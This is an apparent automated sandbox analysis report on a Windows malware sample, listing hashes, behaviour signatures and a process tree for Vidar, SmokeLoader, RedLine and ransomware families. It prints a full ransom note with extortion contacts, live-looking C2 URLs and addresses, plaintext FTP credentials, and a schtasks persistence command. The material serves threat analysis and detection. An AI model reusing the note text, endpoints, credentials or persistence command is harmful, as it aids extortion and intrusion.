Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    1801s
  • max time network
    1809s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    06-08-2021 23:43

General

  • Target

    8 (18).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Path

C:\_readme.txt

Ransom Note
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-CnI3tI6Ktv Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: manager@mailtemp.ch Reserve e-mail address to contact us: managerhelper@airmail.cc Your personal ID: 0322gDrgofRiXRqq62TeogIfmpihYZJ6wDmuUVD07WwczX6Bm
Emails

manager@mailtemp.ch

managerhelper@airmail.cc

URLs

https://we.tl/t-CnI3tI6Ktv

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    files.000webhost.com
  • Port:
    21
  • Username:
    hhh6786
  • Password:
    Sutana666

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Extracted

Family

vidar

Version

39.9

Botnet

937

C2

https://prophefliloc.tumblr.com/

Attributes
  • profile_id

    937

Extracted

Family

redline

Botnet

installs

C2

178.32.202.118:43127

Extracted

Family

redline

Botnet

Focus1

C2

135.148.139.222:33569

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Detected phishing page
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 5 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • suricata: ET MALWARE GCleaner Downloader Activity M1

    suricata: ET MALWARE GCleaner Downloader Activity M1

  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)

    suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)

  • suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)

    suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)

  • suricata: ET MALWARE Possible Dridex Download URI Struct with no referer

    suricata: ET MALWARE Possible Dridex Download URI Struct with no referer

  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

    suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Nirsoft 1 IoCs
  • Vidar Stealer 4 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 48 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • Modifies extensions of user files 10 IoCs

    Ransomware generally changes the extension on encrypted files.

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 60 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 32 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 17 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 51 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 30 IoCs
  • Suspicious use of SetThreadContext 43 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 32 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 14 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 15 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 5 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 8 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 54 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • NTFS ADS 1 IoCs
  • Script User-Agent 9 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 16 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
    1⤵
      PID:2304
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
        PID:2592
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2568
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Browser
          1⤵
          • Modifies registry class
          PID:2488
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
            PID:2340
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1868
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1436
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1348
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1256
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1088
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:948
                      • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                        2⤵
                        • Executes dropped EXE
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Drops file in System32 directory
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:1136
                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                        2⤵
                        • Suspicious use of SetThreadContext
                        PID:6712
                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                          3⤵
                            PID:2028
                            • C:\Windows\SysWOW64\schtasks.exe
                              /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                              4⤵
                              • Creates scheduled task(s)
                              PID:4764
                              • C:\Windows\System32\Conhost.exe
                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                5⤵
                                  PID:6508
                          • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                            C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                            2⤵
                            • Checks BIOS information in registry
                            • Checks whether UAC is enabled
                            • Drops file in System32 directory
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            PID:4504
                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                            2⤵
                            • Suspicious use of SetThreadContext
                            PID:6484
                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                              3⤵
                                PID:5652
                            • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                              C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                              2⤵
                              • Checks BIOS information in registry
                              • Checks whether UAC is enabled
                              • Drops file in System32 directory
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              PID:6656
                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                              2⤵
                              • Suspicious use of SetThreadContext
                              PID:6572
                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                3⤵
                                  PID:5364
                              • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                2⤵
                                • Checks BIOS information in registry
                                • Checks whether UAC is enabled
                                • Drops file in System32 directory
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                PID:5008
                              • C:\Users\Admin\AppData\Local\9da19bbe-73dd-4536-9889-554993612cac\AAA8.exe
                                C:\Users\Admin\AppData\Local\9da19bbe-73dd-4536-9889-554993612cac\AAA8.exe --Task
                                2⤵
                                • Suspicious use of SetThreadContext
                                PID:2328
                                • C:\Users\Admin\AppData\Local\9da19bbe-73dd-4536-9889-554993612cac\AAA8.exe
                                  C:\Users\Admin\AppData\Local\9da19bbe-73dd-4536-9889-554993612cac\AAA8.exe --Task
                                  3⤵
                                    PID:6696
                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                  2⤵
                                  • Suspicious use of SetThreadContext
                                  PID:4504
                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                    3⤵
                                      PID:4212
                                  • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                    C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                    2⤵
                                    • Checks BIOS information in registry
                                    • Checks whether UAC is enabled
                                    • Drops file in System32 directory
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    PID:3324
                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                    2⤵
                                    • Suspicious use of SetThreadContext
                                    PID:4764
                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                      3⤵
                                        PID:2940
                                    • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                      C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                      2⤵
                                      • Checks BIOS information in registry
                                      • Checks whether UAC is enabled
                                      • Drops file in System32 directory
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:6156
                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                      2⤵
                                      • Suspicious use of SetThreadContext
                                      PID:2612
                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                        3⤵
                                          PID:4320
                                      • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                        C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                        2⤵
                                        • Checks BIOS information in registry
                                        • Checks whether UAC is enabled
                                        • Drops file in System32 directory
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        PID:6968
                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                        2⤵
                                        • Suspicious use of SetThreadContext
                                        PID:1584
                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                          3⤵
                                            PID:5460
                                        • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                          C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                          2⤵
                                          • Checks BIOS information in registry
                                          • Checks whether UAC is enabled
                                          • Drops file in System32 directory
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          PID:6956
                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                          2⤵
                                          • Suspicious use of SetThreadContext
                                          PID:3284
                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                            3⤵
                                              PID:2624
                                          • C:\Users\Admin\AppData\Roaming\eafvsiu
                                            C:\Users\Admin\AppData\Roaming\eafvsiu
                                            2⤵
                                            • Checks SCSI registry key(s)
                                            • Suspicious behavior: MapViewOfSection
                                            PID:864
                                          • C:\Windows\system32\rundll32.exe
                                            C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\hdvAaRs\hdvAaRs.dll",hdvAaRs
                                            2⤵
                                            • Windows security modification
                                            • Drops file in System32 directory
                                            • Modifies data under HKEY_USERS
                                            PID:3604
                                          • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                            C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                            2⤵
                                            • Checks BIOS information in registry
                                            • Checks whether UAC is enabled
                                            • Drops file in System32 directory
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            PID:4836
                                          • C:\Users\Admin\AppData\Local\9da19bbe-73dd-4536-9889-554993612cac\AAA8.exe
                                            C:\Users\Admin\AppData\Local\9da19bbe-73dd-4536-9889-554993612cac\AAA8.exe --Task
                                            2⤵
                                            • Suspicious use of SetThreadContext
                                            PID:5900
                                            • C:\Users\Admin\AppData\Local\9da19bbe-73dd-4536-9889-554993612cac\AAA8.exe
                                              C:\Users\Admin\AppData\Local\9da19bbe-73dd-4536-9889-554993612cac\AAA8.exe --Task
                                              3⤵
                                                PID:7020
                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                              2⤵
                                              • Suspicious use of SetThreadContext
                                              PID:6624
                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                3⤵
                                                  PID:6900
                                              • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                2⤵
                                                • Checks BIOS information in registry
                                                • Checks whether UAC is enabled
                                                • Drops file in System32 directory
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                PID:6780
                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                2⤵
                                                • Suspicious use of SetThreadContext
                                                PID:5956
                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                  3⤵
                                                    PID:4288
                                                • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                  C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                  2⤵
                                                  • Checks BIOS information in registry
                                                  • Checks whether UAC is enabled
                                                  • Drops file in System32 directory
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  PID:6924
                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                  2⤵
                                                  • Suspicious use of SetThreadContext
                                                  PID:4408
                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                    3⤵
                                                      PID:6340
                                                  • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                    C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                    2⤵
                                                    • Checks BIOS information in registry
                                                    • Checks whether UAC is enabled
                                                    • Drops file in System32 directory
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    PID:3132
                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                    2⤵
                                                    • Suspicious use of SetThreadContext
                                                    PID:4220
                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                      3⤵
                                                        PID:2252
                                                    • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                      C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                      2⤵
                                                      • Checks BIOS information in registry
                                                      • Checks whether UAC is enabled
                                                      • Drops file in System32 directory
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      PID:5380
                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                      2⤵
                                                      • Suspicious use of SetThreadContext
                                                      PID:4928
                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                        3⤵
                                                          PID:3796
                                                      • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                        C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                        2⤵
                                                        • Checks BIOS information in registry
                                                        • Checks whether UAC is enabled
                                                        • Drops file in System32 directory
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        PID:6464
                                                      • C:\Users\Admin\AppData\Local\9da19bbe-73dd-4536-9889-554993612cac\AAA8.exe
                                                        C:\Users\Admin\AppData\Local\9da19bbe-73dd-4536-9889-554993612cac\AAA8.exe --Task
                                                        2⤵
                                                        • Suspicious use of SetThreadContext
                                                        PID:6332
                                                        • C:\Users\Admin\AppData\Local\9da19bbe-73dd-4536-9889-554993612cac\AAA8.exe
                                                          C:\Users\Admin\AppData\Local\9da19bbe-73dd-4536-9889-554993612cac\AAA8.exe --Task
                                                          3⤵
                                                            PID:6040
                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                          2⤵
                                                          • Suspicious use of SetThreadContext
                                                          PID:5020
                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                            3⤵
                                                              PID:4740
                                                          • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                            C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                            2⤵
                                                            • Checks BIOS information in registry
                                                            • Checks whether UAC is enabled
                                                            • Drops file in System32 directory
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            PID:7060
                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                            2⤵
                                                            • Suspicious use of SetThreadContext
                                                            PID:5092
                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                              3⤵
                                                                PID:4508
                                                            • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                              C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                              2⤵
                                                              • Checks BIOS information in registry
                                                              • Checks whether UAC is enabled
                                                              • Drops file in System32 directory
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              PID:6112
                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                              2⤵
                                                              • Suspicious use of SetThreadContext
                                                              PID:6996
                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                3⤵
                                                                  PID:1280
                                                              • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                2⤵
                                                                • Checks BIOS information in registry
                                                                • Checks whether UAC is enabled
                                                                • Drops file in System32 directory
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                PID:4608
                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                2⤵
                                                                • Suspicious use of SetThreadContext
                                                                PID:6948
                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                  3⤵
                                                                    PID:5308
                                                                • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                  C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                  2⤵
                                                                  • Checks BIOS information in registry
                                                                  • Checks whether UAC is enabled
                                                                  • Drops file in System32 directory
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  PID:5872
                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                  2⤵
                                                                  • Suspicious use of SetThreadContext
                                                                  PID:6652
                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                    3⤵
                                                                      PID:4588
                                                                  • C:\Users\Admin\AppData\Roaming\eafvsiu
                                                                    C:\Users\Admin\AppData\Roaming\eafvsiu
                                                                    2⤵
                                                                    • Checks SCSI registry key(s)
                                                                    • Suspicious behavior: MapViewOfSection
                                                                    PID:6336
                                                                  • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                    C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                    2⤵
                                                                    • Checks BIOS information in registry
                                                                    • Checks whether UAC is enabled
                                                                    • Drops file in System32 directory
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    PID:7064
